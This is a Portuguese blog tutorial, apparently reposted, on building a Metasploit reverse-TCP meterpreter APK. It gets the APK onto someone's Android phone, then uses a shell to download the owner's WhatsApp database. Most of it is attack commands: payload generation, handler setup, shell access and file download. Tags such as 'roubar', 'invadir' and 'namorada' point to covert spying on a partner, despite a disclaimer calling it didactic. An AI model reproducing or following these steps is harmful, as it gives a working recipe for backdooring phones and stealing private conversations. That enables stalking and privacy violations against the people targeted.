Atenção o tutorial abaixo pode não funcionar, recomendamos que teste. Não nos responsabilizamos pelos seus atos ou de nossos leitores - este artigo possui fins didáticos.
Utilizando uma distribuição Linux - como o Kali Linux por exemplo - é possível criar um backdoor para infectar aparelhos Android graças a um módulo disponível no Metasploit Framework.
Primeiro crie um payload e dê enter:
# msfpayload android/meterpreter/reverse_tcp LHOST=[ip] LPORT=[porta] R > nomedo.apk
Para saber o IP que deverá digitar em LHOST, digite em uma nova aba do terminal "ifconfig" e confira o ip da sua rede. Em LPORT você pode usar a porta 4444 ou outra, lembrando que a porta do seu modem/roteador precisa estar aberta.
Pronto, agora envie o arquivo gerado para o smartphone e instale - se vire amigo.
Depois de ter instalado o arquivo para o smartphone, volte ao terminal, digite "msfconsole" e vamos prosseguir com o seguinte comando:
# use exploit/multi/handler
# set PAYLOAD android/meterpreter/reverse_tcp
# set LHOST [ip]
# set LPORT [porta]
# exploit
Se ocorrer tudo certo, após digitar o comando "exploit" o Metasploit vai acusar conexão reversa e então abrirá automaticamente o Meterpreter. Então agora use o comando abaixo para abrir o shell interativo do terminal.
# shell
Depois, utilizando os comando abaixo você deve navegar até a pasta do WhatsApp chamada Databases - geralmente fica em: /sdcard/WhatsApp/Databases.
pwd - mostra em que local você está.
ls - mostra os arquivos de onde você está.
cd - é como se fosse o click de um mouse para abrir uma pasta.
Quando achar o local dos arquivos e anotar a localização dos arquivos, dê um "exit". Em seguida digite o seguinte comando abaixo para realizar o download dos arquivos:
download caminho/arquivo/vítima/arquivo /root/Desktop
Ali em cima onde está /root/Desktop é o local onde salvará os arquivos baixados.
Feito o download, você perceberá que os arquivos estão criptografados, o WhatsApp muda a criptografia periodicamente - por isto coloquei lá em cima do artigo "Atenção o tutorial abaixo pode não funcionar".
Sobre descriptografar, confira clicando aqui.
Fonte: shellzen.net
Tags: hacker, tutorial, dicas, Android, conexão, remoto, Whatsapp, descobrir conversas, capturar, roubar, invadir, namorada, imagens, fotos, vídeos, cracker, apk, Teste De Invasão, conversas, apk, backdoor, payload, Database (Software Genre),
